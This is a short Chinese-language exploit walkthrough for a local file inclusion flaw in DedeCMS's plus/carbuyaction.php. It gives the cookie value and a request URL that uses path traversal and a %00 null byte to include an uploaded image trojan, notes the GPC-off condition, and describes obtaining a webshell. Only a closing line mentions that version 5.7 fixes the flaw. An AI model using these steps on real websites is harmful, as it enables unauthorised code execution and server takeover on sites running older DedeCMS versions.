1. 首先利用cookie修改工具，加上code=alipay然后訪問
2. http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00
3. 直接包含成功
4. 利用條件為GPCOFF，或者某些環境下的截斷。
5. 可以在會員中心里上傳個圖片木馬進行拿shell。
6. 還可以包含dede自身文件進行更多利用，這里就不詳細了。

現在最新版的DEDECMS5.7已經修復了這個錯誤，如果是早起的版本DEDECMS請用最新版文件覆蓋即可